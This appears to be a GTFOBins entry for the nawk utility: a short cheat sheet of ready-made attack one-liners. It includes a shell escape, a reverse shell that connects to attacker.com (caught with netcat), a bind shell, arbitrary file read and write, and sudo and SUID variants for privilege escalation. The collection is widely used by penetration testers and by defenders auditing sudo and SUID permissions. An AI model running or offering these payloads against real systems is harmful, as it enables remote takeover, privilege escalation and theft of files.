GTFOBins.github.io/_gtfobins/nawk.md
2019-08-30 15:40:42 +02:00

1.2 KiB

functions
shell non-interactive-reverse-shell non-interactive-bind-shell file-write file-read sudo limited-suid
code
nawk 'BEGIN {system("/bin/sh")}'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 nawk -v LPORT=$LPORT 'BEGIN { s = "/inet/tcp/" LPORT "/0/0"; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
code
LFILE=file_to_write nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
code
LFILE=file_to_read nawk '//' "$LFILE"
code
sudo nawk 'BEGIN {system("/bin/sh")}'
code
./nawk 'BEGIN {system("/bin/sh")}'